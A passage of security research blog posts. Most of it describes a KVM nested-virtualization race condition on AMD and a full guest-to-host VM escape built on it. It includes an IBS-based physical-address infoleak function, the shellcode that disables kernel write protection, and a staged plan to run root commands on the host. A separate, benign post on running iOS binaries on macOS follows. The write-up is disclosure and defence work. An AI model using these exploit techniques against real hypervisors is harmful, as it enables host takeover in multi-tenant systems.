        hsave->save.ds     = vmcb->save.ds;

        hsave->save.gdtr   = vmcb->save.gdtr;

        hsave->save.idtr   = vmcb->save.idtr;

        hsave->save.efer   = svm->vcpu.arch.efer;

        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);

        hsave->save.cr4    = svm->vcpu.arch.cr4;

        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

        hsave->save.rip    = kvm_rip_read(&svm->vcpu);

        hsave->save.rsp    = vmcb->save.rsp;

        hsave->save.rax    = vmcb->save.rax;

        if (npt_enabled)

                hsave->save.cr3    = vmcb->save.cr3;

        else

                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

        svm->nested.nested_run_pending = 1;

        if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12)) ** 4 **

                goto out_exit_err;

        if (nested_svm_vmrun_msrpm(svm))

                goto out;

out_exit_err:

        svm->nested.nested_run_pending = 0;

        svm->vmcb->control.exit_code    = SVM_EXIT_ERR;

        svm->vmcb->control.exit_code_hi = 0;

        svm->vmcb->control.exit_info_1  = 0;

        svm->vmcb->control.exit_info_2  = 0;

        nested_svm_vmexit(svm);

out:

        kvm_vcpu_unmap(&svm->vcpu, &map, true);

        return ret;

}

The function first fetches the value of RAX out of the currently active vmcb (svm->vcmb) in 1 (numbers are marked in the code samples). For guests using nested paging (which is the only relevant configuration nowadays) RAX contains a guest physical address (GPA), which needs to be translated into a host physical address (HPA) first. kvm_vcpu_map (2) takes care of this translation and maps the underlying page to a host virtual address (HVA) that can be directly accessed by KVM.

Once the VMCB is mapped, nested_vmcb_checks is called for some basic validation in 3. Afterwards, the L1 guest context which is stored in svm->vmcb is copied into the host save area svm->nested.hsave before KVM enters the nested guest context by calling enter_svm_guest_mode (4).

int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,

                         struct vmcb *vmcb12)

{

        int ret;

        svm->nested.vmcb12_gpa = vmcb12_gpa;

        load_nested_vmcb_control(svm, &vmcb12->control);

        nested_prepare_vmcb_save(svm, vmcb12);

        nested_prepare_vmcb_control(svm);

        ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,

                                  nested_npt_enabled(svm));

        if (ret)

                return ret;

        svm_set_gif(svm, true);

        return 0;

}

static void load_nested_vmcb_control(struct vcpu_svm *svm,

                                     struct vmcb_control_area *control)

{

        copy_vmcb_control_area(&svm->nested.ctl, control);

        ...

}

Looking at enter_svm_guest_mode we can see that KVM copies the vmcb12 control area directly into svm->nested.ctl and does not perform any further checks on the copied value.

Readers familiar with double fetch or Time-of-Check-to-Time-of-Use vulnerabilities might already see a potential issue here: The call to nested_vmcb_checks at the beginning of nested_svm_vmrun performs all of its checks on a copy of the VMCB that is stored in guest memory. This means that a guest with multiple CPU cores can modify fields in the VMCB after they are verified in nested_vmcb_checks, but before they are copied to svm->nested.ctl in load_nested_vmcb_control.

Let’s look at nested_vmcb_checks to see what kind of checks we can bypass with this approach:

static bool nested_vmcb_check_controls(struct vmcb_control_area *control)

{

        if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)

                return false;

        if (control->asid == 0)

                return false;

        if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&

            !npt_enabled)

                return false;

        return true;

}

At first glance this looks pretty harmless. control->asid isn’t used anywhere and the last check is only relevant for systems where nested paging isn’t supported. However, the first check turns out to be very interesting.

For reasons unknown to me, SVM VMCBs contain a bit that enables or disables interception of the VMRUN instruction when executed inside a guest. Clearing this bit isn’t actually supported by hardware and results in an immediate VMEXIT, so the check in nested_vmcb_check_controls simply replicates this behavior.  When we race and bypass the check by repeatedly flipping the value of the INTERCEPT_VMRUN bit, we can end up in a situation where svm->nested.ctl contains a 0 in place of the INTERCEPT_VMRUN bit. To understand the impact we first need to see how nested vmexit’s are handled in KVM:

The main SVM exit handler is the function handle_exit in arch/x86/kvm/svm.c, which is called whenever a VMexit occurs. When KVM is running a nested guest, it first has to check if the exit should be handled by itself or the L1 hypervisor. To do this it calls the function nested_svm_exit_handled (5) which will return NESTED_EXIT_DONE if the vmexit will be handled by the L1 hypervisor and no further processing by the L0 hypervisor is needed:

 static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)

{

        struct vcpu_svm *svm = to_svm(vcpu);

        struct kvm_run *kvm_run = vcpu->run;

        u32 exit_code = svm->vmcb->control.exit_code;

         

        if (is_guest_mode(vcpu)) {

                int vmexit;

                trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);

                vmexit = nested_svm_exit_special(svm);

                if (vmexit == NESTED_EXIT_CONTINUE)

                        vmexit = nested_svm_exit_handled(svm); ** 5 **

                if (vmexit == NESTED_EXIT_DONE)

                        return 1;

        }

}

static int nested_svm_intercept(struct vcpu_svm *svm)

{

        // exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun

        u32 exit_code = svm->vmcb->control.exit_code;

        int vmexit = NESTED_EXIT_HOST;

        switch (exit_code) {

        case SVM_EXIT_MSR:

                vmexit = nested_svm_exit_handled_msr(svm);

                break;

        case SVM_EXIT_IOIO:

                vmexit = nested_svm_intercept_ioio(svm);

                break;

         

        default: {

                if (vmcb_is_intercept(&svm->nested.ctl, exit_code)) ** 7 **

                        vmexit = NESTED_EXIT_DONE;

        }

        }

        return vmexit;

}

int nested_svm_exit_handled(struct vcpu_svm *svm)

{

        int vmexit;

        vmexit = nested_svm_intercept(svm); ** 6 ** 

        if (vmexit == NESTED_EXIT_DONE)

                nested_svm_vmexit(svm); ** 8 **

        return vmexit;

}

nested_svm_exit_handled first calls nested_svm_intercept (6) to see if the exit should be handled. When we trigger an exit by executing VMRUN in a L2 guest, the default case is executed (7) to see if the INTERCEPT_VMRUN bit in svm->nested.ctl is set. Normally, this should always be the case and the function returns NESTED_EXIT_DONE to trigger a nested VM exit from L2 to L1 and to let the L1 hypervisor handle the exit (8). (This way KVM supports infinite nesting of hypervisors).

However, if the L1 guest exploited the race condition described above svm->nested.ctl won’t have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 guest context. nested_svm_vmrun isn’t written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsave with data from the currently active svm->vmcb which contains data for the L2 guest:

     /*

         * Save the old vmcb, so we don't need to pick what we save, but can

         * restore everything when a VMEXIT occurs

         */

        hsave->save.es     = vmcb->save.es;

        hsave->save.cs     = vmcb->save.cs;

        hsave->save.ss     = vmcb->save.ss;

        hsave->save.ds     = vmcb->save.ds;

        hsave->save.gdtr   = vmcb->save.gdtr;

        hsave->save.idtr   = vmcb->save.idtr;

        hsave->save.efer   = svm->vcpu.arch.efer;

        hsave->save.cr0    = kvm_read_cr0(&svm->vcpu);

        hsave->save.cr4    = svm->vcpu.arch.cr4;

        hsave->save.rflags = kvm_get_rflags(&svm->vcpu);

        hsave->save.rip    = kvm_rip_read(&svm->vcpu);

        hsave->save.rsp    = vmcb->save.rsp;

        hsave->save.rax    = vmcb->save.rax;

        if (npt_enabled)

                hsave->save.cr3    = vmcb->save.cr3;

        else

                hsave->save.cr3    = kvm_read_cr3(&svm->vcpu);

        copy_vmcb_control_area(&hsave->control, &vmcb->control);

This becomes a security issue due to the way Model Specific Register (MSR) intercepts are handled for nested guests:

SVM uses a permission bitmap to control which MSRs can be accessed by a VM. The bitmap is a 8KB data structure with two bits per MSR, one of which controls read access and the other write access. A 1 bit in this position means the access is intercepted and triggers a vm exit, a 0 bit means the VM has direct access to the MSR. The HPA address of the bitmap is stored in the VMCB control area and for normal L1 KVM guests, the pages are allocated and pinned into memory as soon as a vCPU is created.

For a nested guest, the MSR permission bitmap is stored in svm->nested.msrpm and its physical address is copied into the active VMCB (in svm->vmcb->control.msrpm_base_pa) while the nested guest is running. Using the described double invocation of nested_svm_vmrun, a malicious guest can copy this value into the svm->nested.hsave VMCB when copy_vmcb_control_area is executed. This is interesting because the KVM’s hsave area normally only contains data from the L1 guest context so svm->nested.hsave.msrpm_base_pa would normally point to the pinned vCPU-specific MSR bitmap pages.

This edge case becomes exploitable thanks to a relatively recent change in KVM:

Since commit “2fcf4876: KVM: nSVM: implement on demand allocation of the nested state” from last October, svm->nested.msrpm is dynamically allocated and freed when a guest changes the SVME bit of the MSR_EFER register:

int svm_set_efer(struct kvm_vcpu *vcpu, u64 efer)

{

        struct vcpu_svm *svm = to_svm(vcpu);

        u64 old_efer = vcpu->arch.efer;

        vcpu->arch.efer = efer;

        if ((old_efer & EFER_SVME) != (efer & EFER_SVME)) {

                if (!(efer & EFER_SVME)) {

                        svm_leave_nested(svm);

                        svm_set_gif(svm, true);

                        ...                     /*

                         * Free the nested guest state, unless we are in SMM.

                         * In this case we will return to the nested guest

                         * as soon as we leave SMM.

                         */

                        if (!is_smm(&svm->vcpu))

                                svm_free_nested(svm);

                } ...

}

}

For the “disable SVME” case, KVM will first call svm_leave_nested to forcibly leave potential

nested guests and then free the svm->nested data structures (including the backing pages for the MSR permission bitmap) in svm_free_nested. As svm_leave_nested believes that svm->nested.hsave contains the saved context of the L1 guest, it simply copies its control area to the real VMCB:

void svm_leave_nested(struct vcpu_svm *svm)

{

        if (is_guest_mode(&svm->vcpu)) {

                struct vmcb *hsave = svm->nested.hsave;

                struct vmcb *vmcb = svm->vmcb;

                ...

                copy_vmcb_control_area(&vmcb->control, &hsave->control);

                ...

        }

}

But as mentioned before, svm->nested.hsave->control.msrpm_base_pa can still point to

svm->nested->msrpm. Once svm_free_nested is finished and KVM passes control back to the guest, the CPU will use the freed pages for its MSR permission checks. This gives a guest unrestricted access to host MSRs if the pages are reused and partially overwritten with zeros.

To summarize, a malicious guest can gain access to host MSRs using the following approach:

  1. Enable the SVME bit in MSR_EFER to enable nested virtualization
  2. Repeatedly try to launch a L2 guest using the VMRUN instruction while flipping the INTERCEPT_VMRUN bit on a second CPU core.
  3. If VMRUN succeeds, try to launch a “L3” guest using another invocation of VMRUN. If this fails, we have lost the race in step 2 and must try again. If VMRUN succeeds we have successfully overwritten svm->nested.hsave with our L2 context.  
  4. Clear the SVME bit in MSR_EFER while still running in the “L3” context. This frees the MSR permission bitmap backing pages used by the L2 guest who is now executing again.
  5. Wait until the KVM host reuses the backing pages. This will potentially clear all or some of the bits, giving the guest access to host MSRs.

When I initially discovered and reported this vulnerability, I was feeling pretty confident that this type of MSR access should be more or less equivalent to full code execution on the host. While my feeling turned out to be correct, getting there still took me multiple weeks of exploit development. In the next section I’ll describe the steps to turn this primitive into a guest-to-host escape.

The Exploit

Assuming our guest can get full unrestricted access to any MSR (which is only a question of timing thanks to init_on_alloc=1 being the default for most modern distributions), how can we escalate this into running arbitrary code in the context of the KVM host? To answer this question we first need to look at what kind of MSRs are supported on a modern AMD system. Looking at the BIOS and Kernel Developer’s Guide for recent AMD processors we can find a wide range of MSRs starting with well known and widely used ones such as EFER (the Extended Feature Enable Register) or LSTAR (the syscall target address) to rarely used ones like SMI_ON_IO_TRAP (can be used to generate a System Management Mode Interrupt when specific IO port ranges are accessed).

Looking at the list, several registers like LSTAR or KERNEL_GSBASE seem like interesting targets for redirecting the execution of the host kernel. Unrestricted access to these registers is actually enabled by default, however they are automatically restored to a valid state by KVM after a vmexit so modifying them does not lead to any changes in host behavior.

Still, there is one MSR that we previously mentioned and that seems to give us a straightforward way to achieve code execution: The VM_HSAVE_PA that stores the physical address of the host save area, which is used to restore the host context when a vmexit occurs. If we can point this MSR at a memory location under our control we should be able to fake a malicious host context and execute our own code after a vmexit.

While this sounds pretty straightforward in theory, implementing it still has some challenges:

  • AMD is pretty clear about the fact that software should not touch the host save area in any way and that the data stored in this area is CPU-dependent: “Processor implementations may store only part or none of host state in the memory area pointed to by VM_HSAVE_PA MSR and may store some or all host state in hidden on-chip memory. Different implementations may choose to save the hidden parts of the host’s segment registers as well as the selectors. For these reasons, software must not rely on the format or contents of the host state save area, nor attempt to change host state by modifying the contents of the host save area.” (AMD64 Architecture Programmer’s Manual, Volume 2: System Programming, Page 477). To strengthen the point, the format of the host save area is undocumented.
  • Debugging issues involving an invalid host state is very tedious as any issue leads to an immediate processor shutdown. Even worse, I wasn’t sure if rewriting the VM_HSAVE_PA MSR while running inside a VM can even work. It’s not really something that should happen during normal operation so in the worst case scenario, overwriting the MSR would just lead to an immediate crash.
  • Even if we can create a valid (but malicious) host save area in our guest, we still need some way to identify its host physical address (HPA). Because our guest runs with nested paging enabled, physical addresses that we can see in the guest (GPAs) are still one address translation away from their HPA equivalent.

After spending some time scrolling through AMD’s documentation, I still decided that VM_HSAVE_PA seems to be the best way forward and decided to tackle these problems one by one.

After dumping the host save area of a normal KVM guest running on an AMD EPYC 7351P CPU, the first problem goes away quickly: As it turns out, the host save area has the same layout as a normal VMCB with only a couple of relevant fields initialized. Even better, the initialized fields include all the saved host information documented in the AMD manual so the fear that all interesting host state is stored in on-chip memory seems to be unfounded.

Saving Host State. To ensure that the host can resume operation after #VMEXIT, VMRUN saves at least the following host state information:

  • CS.SEL, NEXT_RIP—The CS selector and rIP of the instruction following the VMRUN. On #VMEXIT the host resumes running at this address.
  • RFLAGS, RAX—Host processor mode and the register used by VMRUN to address the VMCB.
  • SS.SEL, RSP—Stack pointer for host
  • CRO, CR3, CR4, EFER—Paging/operating mode for host
  • IDTR, GDTR—The pseudo-descriptors. VMRUN does not save or restore the host LDTR.
  • ES.SEL and DS.SEL.

Under the mistaken assumption that I solved the problem of creating a fake but valid host save area, I decided to look into building an infoleak that gives me the ability to translate GPAs to HPAs. A couple hours of manual reading led me to an AMD-specific performance monitoring feature called Instruction Based Sampling (IBS). When IBS is enabled by writing the right magic invocation to a set of MSRs, it samples every Nth instruction that is executed and collects a wide range of information about the instruction. This information is logged in another set of MSRs and can be used to analyze the performance of any piece of code running on the CPU. While most of the documentation for IBS is pretty sparse or hard to follow, the very useful open source project AMD IBS Toolkit contains working code, a readable high level description of IBS and a lot of useful references.

IBS supports two different modes of operation, one that samples Instruction fetches and one that samples micro-ops (which you can think of as the internal RISC representation of more complex x64 instructions). Depending on the operation mode, different data is collected. Besides a lot of caching and latency information that we don’t care about, fetch sampling also returns the virtual address and physical address of the fetched instruction. Op sampling is even more useful as it returns the virtual address of the underlying instruction as well as virtual and physical addresses accessed by any load or store micro op.

Interestingly, IBS does not seem to care about the virtualization context of its user and every physical address returned by it is an HPA (of course this is not a problem outside of this exploit as guest accesses to the IBS MSR’s will normally be restricted). The wide range of data returned by IBS and the fact that it’s completely driven by MSR reads and writes make it the perfect tool for building infoleaks for our exploit.

Building a GPA -> HPA leak boils down to enabling IBS ops sampling, executing a lot of instructions that access a specific memory page in our VM and reading the IBS_DC_PHYS_AD MSR to find out its HPA:

// This function leaks the HPA of a guest page using

// AMD's Instruction Based Sampling. We try to sample

// one of our memory loads/writes to *p, which will

// store the physical memory address in MSR_IBC_DH_PHYS_AD

static u64 leak_guest_hpa(u8 *p) {

  volatile u8 *ptr = p;

  u64 ibs = scatter_bits(0x2, IBS_OP_CUR_CNT_23) |

            scatter_bits(0x10, IBS_OP_MAX_CNT) | IBS_OP_EN;

  while (true) {

    wrmsr(MSR_IBS_OP_CTL, ibs);

    u64 x = 0;

    for (int i = 0; i < 0x1000; i++) {

      x = ptr[i];

      ptr[i] += ptr[i - 1];

      ptr[i] = x;

      if (i % 50 == 0) {

        u64 valid = rdmsr(MSR_IBS_OP_CTL) & IBS_OP_VAL;

        if (valid) {

          u64 op3 = rdmsr(MSR_IBS_OP_DATA3);

          if ((op3 & IBS_ST_OP) || (op3 & IBS_LD_OP)) {

            if (op3 & IBS_DC_PHY_ADDR_VALID) {

              printf("[x] leak_guest_hpa: %lx %lx %lx\n", rdmsr(MSR_IBS_OP_RIP),

                     rdmsr(MSR_IBS_DC_PHYS_AD), rdmsr(MSR_IBS_DC_LIN_AD));

              return rdmsr(MSR_IBS_DC_PHYS_AD) & ~(0xFFF);

            }

          }

          wrmsr(MSR_IBS_OP_CTL, ibs);

        }

      }

    }

    wrmsr(MSR_IBS_OP_CTL, ibs & ~IBS_OP_EN);

  }

}

Using this infoleak primitive, I started to create a fake host save area by preparing my own page tables (for pointing CR3 at them), interrupt descriptor tables and segment descriptors and pointing RIP to a primitive shellcode that would write to the serial console. Of course, my first tries immediately crashed the whole system and even after spending multiple days to make sure everything was set up correctly, the system would crash immediately once I pointed the hsave MSR at my own location.

After getting frustrated with the total lack of progress, watching my server reboot for the hundredth time, trying to come up with a different exploitation strategy for two weeks and learning about the surprising regularity of physical page migrations on Linux, I realized that I made an important mistake. Just because the CPU initializes all the expected fields in the host save area, it is not safe to assume that these fields are actually used for restoring the host context. Slow trial and error led to the discovery that my AMD EPYC CPU ignores everything in the host save area besides the values of the RIP, RSP and RAX registers.

While this register control would make a local privilege escalation straightforward, escaping the VM boundary is a bit more complicated. RIP and RSP control make launching a kernel ROP chain the next logical step, but this requires us to first break the host kernel's address randomization and to find a way to store controlled data at a known host virtual address (HVA).

Fortunately, we have IBS as a powerful infoleak building primitive and can use it to gather all required information in a single run:

  • Leaking the host kernel's (or more specifically kvm-amd.ko’s) base address can be done by enabling IBS sampling with a small sampling interval and immediately triggering a VM exit. When VM execution continues, the IBS result MSRs will contain the HVA of instructions executed by KVM during the exit handling.
  • The most powerful way to store data at a known HVA is to leak the location of the kernel’s linear mapping (also known as physmap), a 1:1 mapping of all physical pages on the system. This gives us a GPA->HVA translation primitive by first using our GPA->HPA infoleak from above and then adding the HPA to the physmap base address. Leaking the physmap is possible by sampling micro ops in the host kernel until we find a read or write operation, where the lower ~30 bits of the accessed virtual address and physical address are identical.

Having all these building blocks in place, we could now try to build a kernel ROP chain that executes some interesting payload. However, there is one important caveat. When we take over execution after a vmexit, the system is still in a somewhat unstable state. As mentioned above, SVM’s context switching is very minimal and we are at least one VMLOAD instruction and reenabling of interrupts away from a usable system. While it is surely possible to exploit this bug and to restore the original host context using a sufficiently complex ROP chain, I decided to find a way to run my own code instead.

A couple of years ago, the Linux physmap was still mapped executable and executing our own code would be as simple as jumping to a physmap mapping of one of our guest pages. Of course, that is not possible anymore and the kernel tries hard to not have any memory pages mapped as writable and executable. Still, page protections only apply to virtual memory accesses so why not use an instruction that directly writes controlled data to a physical address? As you might remember from our initial discussion of SVM earlier in this chapter, SVM supports an instruction called VMSAVE to store hidden guest state (or host state) in a VMCB. Similar to VMRUN, VMSAVE takes a physical address to a VMCB stored in the RAX register as an implicit argument. It then writes the following register state to the VMCB:

  • FS, GS, TR, LDTR
  • KernelGsBase
  • STAR, LSTAR, CSTAR, SFMASK
  • SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP

For us, VMSAVE is interesting for a couple of reasons:

  • It is used as part of KVM’s normal SVM exit handler and can be easily integrated into a minimal ROP chain.
  • It operates on physical addresses, so we can use it to write to an arbitrary memory location including KVM’s own code.
  • All written registers still contain the guest values set by our VM, allowing us to control the written content with some restrictions

VMSAVE’s biggest downside as an exploitation primitive is that RAX needs to be page aligned, reducing our control of the target address. VMSAVE writes to the memory offsets 0x440-0x480 and 0x600-0x638 so we need to be careful about not corrupting any memory that’s in use.

In our case this turns out to be a non-issue, as KVM contains a couple of code pages where functions that are rarely or never used (e.g cleanup_module or SEV specific code) are stored at these offsets.

While we don’t have full control over the written data and valid register values are somewhat restricted, it is still possible to write a minimal stage0 shellcode to an arbitrary page in the host kernel by filling guest MSRs with the right values. My exploit uses the STAR, LSTAR and CSTAR registers for this which are written to the physical offsets 0x400, 0x408 and 0x410. As all three registers need to contain canonical addresses, we can only use parts of the registers for our shellcode and use relative jumps to skip the unusable parts of the STAR and LSTAR MSRs:

  // mov cr0, rbx; jmp

  wrmsr(MSR_STAR, 0x00000003ebc3220f);

  // pop rdi; pop rsi; pop rcx; jmp

  wrmsr(MSR_LSTAR, 0x00000003eb595e5fULL);

  // rep movsb; pop rdi; jmp rdi;

  wrmsr(MSR_CSTAR, 0xe7ff5fa4f3);

The above code makes use of the fact that we control the value of the RBX register and the stack when we return to it as part of our initial ROP chain. First, we copy the value of RBX (0x80040033) into CR0, which disables Write Protection (WP) for kernel memory accesses. This makes all of the kernel code writable on this CPU allowing us to copy a larger stage1 shellcode to an arbitrary unused memory location and jump to it.

Once the WP bit in cr0 is disabled and the stage1 payload executes, we have a wide range of options. For my proof-of-concept exploit I decided on a somewhat boring but easy-to-implement approach to spawn a random user space command: The host is still in a very weird state so our stage1 payload can’t directly call into other kernel functions, but we can easily backdoor a function pointer which will be called at some later point in time. KVM uses the kernel’s global workqueue feature to regularly synchronize a VM’s clock between different vCPUs. The function pointer responsible for this work is stored in the (per VM) kvm->arch data structure as kvm->arch.kvmclock_update_work. The stage1 payload overrides this function pointer with the address of a stage2 payload. To put the host into a usable state it then sets the VM_HSAVE_PA MSR back to its original value and restores RSP and RIP to call the original vmexit handler.

The final stage2 payload executes at some later point in time as part of the kernel global work queue and uses the call_usermodehelper to run an arbitrary command with root privileges.

Let’s put all of this together and walk through the attacks step-by-step:

  1. Prepare the stage0 payload by splitting it up and setting the right guest MSRs.
  2. Trigger the TOCTOU vulnerability in nested_svm_vmrun and free the MSR permission bitmap by disabling the SVME bit in the EFER MSR.
  3. Wait for the pages to be reused and initialized to 0 to get unrestricted MSR access.
  4. Prepare a fake host save area, a stack for the initial ROP chain and a staging memory area for the stage1 and stage2 payloads.
  5. Leak the HPA of the host save area, the HVA addresses of the stack and staging page and the kvm-amd.ko’s base address using the different IBS infoleaks.
  6. Redirect execution to the VMSAVE gadget by setting RIP, RSP and RAX in the fake host save area, pointing the VM_HSAVE_PA MSR at it and triggering a VM exit.
  7. VMSAVE writes the stage0 payload to an unused offset in kvm-amd’s code segment, when the gadget returns stage0 gets executed.
  8. stage0 disables Write Protection in CR0 and overwrites an unused executable memory location with the stage1 and stage2 payloads, before jumping to stage1.
  9. stage1 overwrites kvm->arch.kvmclock_update_work.work.func with a pointer to stage2 before restoring the original host context.
  10. At some later point in time kvm->arch.kvmclock_update_work.work.func is called as part of the global kernel work_queue and stage2 spawns an arbitrary command using call_usermodehelper.

Interested readers should take a look at the heavily documented proof-of-concept exploit for the actual implementation.

Conclusion

This blog post describes a KVM-only VM escape made possible by a small bug in KVM’s AMD-specific code for supporting nested virtualization. Luckily, the feature that made this bug exploitable was only included in two kernel versions (v5.10, v5.11) before the issue was spotted, reducing the real-life impact of the vulnerability to a minimum. The bug and its exploit still serve as a demonstration that highly exploitable security vulnerabilities can still exist in the very core of a virtualization engine, which is almost certainly a small and well audited codebase. While the attack surface of a hypervisor such as KVM is relatively small from a pure LoC perspective, its low level nature, close interaction with hardware and pure complexity makes it very hard to avoid security-critical bugs.

While we have not seen any in-the-wild exploits targeting hypervisors outside of competitions like Pwn2Own, these capabilities are clearly achievable for a well-financed adversary. I’ve spent around two months on this research, working as an individual with only remote access to an AMD system. Looking at the potential ROI on an exploit like this, it seems safe to assume that more people are working on similar issues right now and that vulnerabilities in KVM, Hyper-V, Xen or VMware will be exploited in-the-wild sooner or later. 

What can we do about this? Security engineers working on Virtualization Security should push for as much attack surface reduction as possible. Moving complex functionality to memory-safe user space components is a big win even if it does not help against bugs like the one described above. Disabling unneeded or unreviewed features and performing regular in-depth code reviews for new changes can further reduce the risk of bugs slipping by.

Hosters, cloud providers and other enterprises that are relying on virtualization for multi-tenancy isolation should design their architecture in way that limits the impact of an attacker with an VM escape exploit:

  • Isolation of VM hosts: Machines that host untrusted VMs should be considered at least partially untrusted. While a VM escape can give an attacker full control over a single host, it should not be easily possible to move from one compromised host to another. This requires that the control plane and backend infrastructure is sufficiently hardened and that user resources like disk images or encryption keys are only exposed to hosts that need them. One way to limit the impact of a VM escape even further is to only run VMs of a specific customer or of a certain sensitivity on a single machine.
  • Investing in detection capabilities: In most architectures, the behavior of a VM host should be very predictable, making a compromised host stick out quickly once an attacker tries to move to other systems. While it’s very hard to rule out the possibility of a vulnerability in your virtualization stack, good detection capabilities make life for an attacker much harder and increase the risk of quickly burning a high-value vulnerability. Agents running on the VM host can be a first (but bypassable) detection mechanism, but the focus should be on detecting unusual network communication and resource accesses.

Fuzzing iOS code on macOS at native speed

Or how iOS apps on macOS work under the hood

Posted by Samuel Groß, Project Zero

This short post explains how code compiled for iOS can be run natively on Apple Silicon Macs.

With the introduction of Apple Silicon Macs, Apple also made it possible to run iOS apps natively on these Macs. This is fundamentally possible due to (1) iPhones and Apple Silicon Macs both using the arm64 instruction set architecture (ISA) and (2) macOS using a mostly compatible set of runtime libraries and frameworks while also providing /System/iOSSupport which contains the parts of the iOS runtime that do not exist on macOS. Due to this, it should be possible to run not just complete apps but also standalone iOS binaries or libraries on Mac. This might be interesting for a number of reasons, including:

  • It allows fuzzing closed-source code compiled for iOS on a Mac
  • It allows dynamic analysis of iOS code in a more “friendly” environment

This post explains how this can be achieved in practice. The corresponding code can be found here and allows executing arbitrary iOS binaries and library code natively on macOS. The tool assumes that SIP has been disabled and has been tested on macOS 11.2 and 11.3. With SIP enabled, certain steps will probably fail.

We originally developed this tool for fuzzing a 3rd-party iOS messaging app. While that particular project didn’t yield any interesting results, we are making the tool public as it could help lower the barrier of entry for iOS security research.

The Goal

The ultimate goal of this project is to execute code compiled for iOS natively on macOS. While it would be possible to achieve this goal (at least for some binaries/libraries) simply by swapping the platform identifier in the mach-o binary, our approach will instead use the existing infrastructure for running iOS apps on macOS. This has two benefits:

  1. It will guarantee that all dependent system libraries of the iOS code will exist. In practice, this means that if a dependent library does not already exist on macOS, it will automatically be loaded from /System/iOSSupport instead
  2. The runtime (OS services, frameworks, etc.) will, if necessary, emulate their iOS behavior since they will know that the process is an iOS one

To start, we’ll take a simple piece of C source code and compile it for iOS:

> cat hello.c

#include <stdio.h>

int main() {

    puts("Hello from an iOS binary!");

    return 0;

}

> clang -arch arm64 hello.c -o hello -isysroot \

/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk

> file hello

hello: Mach-O 64-bit executable arm64

> otool -l hello

Load command 10

      cmd LC_BUILD_VERSION

  cmdsize 32

 platform 2           # Platform 2 is iOS

    minos 14.4

      sdk 14.4

   ntools 1

     tool 3

  version 609.8

The Kernel

Attempting to execute the freshly compiled binary (on macOS 11.2) will simply result in

> ./hello

[1]    13699 killed     ./hello

While the exit status informs us that the process was terminated through SIGKILL, it does not contain any additional information about the specific reason for that. However, it does seem likely that the process is terminated by the kernel during the execve(2) or posix_spawn(2) syscall. And indeed, the crash report generated by the system states:

Termination Reason:    EXEC, [0xe] Binary with wrong platform

This error corresponds to EXEC_EXIT_REASON_WRONG_PLATFORM in the kernel, and that constant is only referenced in a single function: check_for_signature:

static int

check_for_signature(proc_t p, struct image_params *imgp)

{

    …;

#if XNU_TARGET_OS_OSX

        /* Check for platform passed in spawn attr if iOS binary is being spawned */

        if (proc_platform(p) == PLATFORM_IOS) {

                struct _posix_spawnattr *psa = imgp->ip_px_sa;

                if (psa == NULL || psa->psa_platform == 0) {

                    …;

                            signature_failure_reason = os_reason_create(OS_REASON_EXEC,

                                        EXEC_EXIT_REASON_WRONG_PLATFORM);

                            error = EACCES;

                            goto done;

                } else if (psa->psa_platform != PLATFORM_IOS) {

                        /* Simulator binary spawned with wrong platform */

                        signature_failure_reason = os_reason_create(OS_REASON_EXEC,

                            EXEC_EXIT_REASON_WRONG_PLATFORM);

                        error = EACCES;

                        goto done;

                } else {

                        printf("Allowing spawn of iOS binary %s since

                            correct platform was passed in spawn\n", p->p_name);

                }

        }

#endif /* XNU_TARGET_OS_OSX */

    …;

}

This code is active on macOS and will execute if the platform of the to-be-executed process is PLATFORM_IOS. In essence, the code checks for an undocumented posix_spawn attribute, psa_platform, and in the absence of it (or if its value is not PLATFORM_IOS), will terminate the process in the way we have previously observed.

As such, to avoid EXEC_EXIT_REASON_WRONG_PLATFORM, it should only be necessary to use the undocumented posix_spawnattr_set_platform_np syscall to set the target platform to PLATFORM_IOS, then invoke posix_spawn to execute the iOS binary:

    posix_spawnattr_t attr;

    posix_spawnattr_init(&attr);

    posix_spawnattr_set_platform_np(&attr, PLATFORM_IOS, 0);

    posix_spawn(&pid, binary_path, NULL, &attr, argv, environ);

Doing that will now result in:

> ./runner hello

...

[*] Child exited with status 5

No more SIGKILL, progress! Exit status 5 corresponds to SIGTRAP, which likely implies that the process is now terminating in userspace. And indeed, the crash report confirms that the process is crashing sometime during library initialization now.

Userspace

At this point we have a PLATFORM_IOS process running in macOS userspace. The next thing that now happens is that dyld, the dynamic linker, starts mapping all libraries that the binary depends on and executes any initializers they might have. Unfortunately, one of the first libraries now being initialized, libsystem_secinit.dylib, tries to determine whether it should initialize the app sandbox based on the binary’s platform and its entitlements. The logic is roughly:

initialize_app_sandbox = False

if entitlement(“com.apple.security.app-sandbox”) == True:

    initialize_app_sandbox = True

if active_platform() == PLATFORM_IOS &&

   entitlement(“com.apple.private.security.no-sandbox”) != True:

    initialize_app_sandbox = True

As such, libsystem_secinit will decide that it should initialize the app sandbox and will then contact secinitd(8), “the security policy initialization daemon”, to obtain a sandbox profile. As that daemon cannot determine the app corresponding to the process in question it will fail, and libsystem_secinit.dylib will then abort(3) the process:

(lldb) bt

* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BREAKPOINT

  * frame #0: libsystem_secinit.dylib`_libsecinit_appsandbox.cold.5

    frame #1: libsystem_secinit.dylib`_libsecinit_appsandbox

    frame #2: libsystem_trace.dylib` ...

    frame #3: libsystem_secinit.dylib`_libsecinit_initializer

    frame #4: libSystem.B.dylib`libSystem_initializer

    frame #5: libdyld.dylib`...

    frame #6: libdyld.dylib`...

    frame #7: libdyld.dylib`dyld3::AllImages::runLibSystemInitializer

    frame #8: libdyld.dylib`...

